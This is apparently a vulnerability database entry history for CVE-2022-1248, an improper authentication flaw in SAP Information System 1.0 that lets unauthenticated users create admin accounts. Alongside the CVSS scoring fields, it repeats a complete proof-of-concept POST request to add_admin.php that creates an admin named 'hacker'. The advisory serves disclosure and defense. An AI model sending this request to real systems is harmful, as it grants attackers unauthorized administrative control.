SAP Information System 1.0 POST Request add_admin.php improper authentication

EntryHistoryDiffjsonxmlCTI

A vulnerability was found in SAP Information System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /SAP_Information_System/controllers/add_admin.php of the component POST Request Handler. The manipulation leads to improper authentication. Using CWE to declare the problem leads to CWE-287. The weakness was published 04/06/2022. This vulnerability is handled as CVE-2022-1248. The attack may be launched remotely. Technical details are available. Furthermore, there is an exploit available. The structure of the vulnerability defines a possible price range of USD $0-$5k at the moment. It is declared as proof-of-concept. The exploit is available at vuldb.com. As 0-day the estimated underground price was around $0-$5k. A possible mitigation has been published even before and not after the disclosure of the vulnerability.

Field	04/06/2022 05:10	04/08/2022 10:18	04/08/2022 10:24
cvss3_vuldb_av	N	N	N
cvss3_vuldb_ac	L	L	L
cvss3_vuldb_pr	N	N	N
cvss3_vuldb_ui	N	N	N
cvss3_vuldb_s	U	U	U
cvss3_vuldb_c	L	L	L
cvss3_vuldb_i	L	L	L
cvss3_vuldb_a	L	L	L
cvss3_vuldb_e	P	P	P
cvss3_vuldb_rc	R	R	R
availability	1	1	1
cve	CVE-2022-1248	CVE-2022-1248	CVE-2022-1248
responsible	VulDB	VulDB	VulDB
date	1649196000 (04/06/2022)	1649196000 (04/06/2022)	1649196000 (04/06/2022)
cvss2_vuldb_av	N	N	N
cvss2_vuldb_ac	L	L	L
cvss2_vuldb_au	N	N	N
cvss2_vuldb_ci	P	P	P
cvss2_vuldb_ii	P	P	P
cvss2_vuldb_ai	P	P	P
cvss2_vuldb_e	POC	POC	POC
cvss2_vuldb_rc	UR	UR	UR
cvss2_vuldb_rl	ND	ND	ND
cvss3_vuldb_rl	X	X	X
cvss2_vuldb_basescore	7.5	7.5	7.5
cvss2_vuldb_tempscore	6.4	6.4	6.4
cvss3_vuldb_basescore	7.3	7.3	7.3
cvss3_vuldb_tempscore	6.6	6.6	6.6
cvss3_meta_basescore	7.3	7.3	7.3
cvss3_meta_tempscore	6.6	6.9	6.9
price_0day	$0-$5k	$0-$5k	$0-$5k
name	SAP Information System	SAP Information System	SAP Information System
version	1.0	1.0	1.0
component	POST Request Handler	POST Request Handler	POST Request Handler
file	/SAP_Information_System/controllers/add_admin.php	/SAP_Information_System/controllers/add_admin.php	/SAP_Information_System/controllers/add_admin.php
cwe	287 (improper authentication)	287 (improper authentication)	287 (improper authentication)
risk	2	2	2
sourcecode	POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1 Host: target.com Content-Length: 345 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI Origin: http://target.com Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c Connection: close ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="username" hacker ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="password" P@ssw0rd! ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="user" admin ------WebKitFormBoundaryYELEK8fMdX63l0iI--	POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1 Host: target.com Content-Length: 345 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI Origin: http://target.com Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c Connection: close ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="username" hacker ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="password" P@ssw0rd! ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="user" admin ------WebKitFormBoundaryYELEK8fMdX63l0iI--	POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1 Host: target.com Content-Length: 345 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI Origin: http://target.com Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c Connection: close ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="username" hacker ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="password" P@ssw0rd! ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="user" admin ------WebKitFormBoundaryYELEK8fMdX63l0iI--
cvss3_cna_av		N	N
cvss3_cna_ac		L	L
cvss3_cna_pr		N	N
cvss3_cna_ui		N	N
cvss3_cna_s		U	U
cvss3_cna_c		L	L
cvss3_cna_i		L	L
cvss3_cna_a		L	L
cve_cna		VulDB	VulDB
cvss3_cna_basescore		7.3	7.3
cve_nvd_summary			A vulnerability was found in SAP Information System 1.0 which has been rated as critical. Affected by this issue is the file /SAP_Information_System/controllers/add_admin.php. An unauthenticated attacker is able to create a new admin account for the web application with a simple POST request. Exploit details were disclosed.

◂ Previous Overview Next ▸

Might our Artificial Intelligence support you?

Check our Alexa App!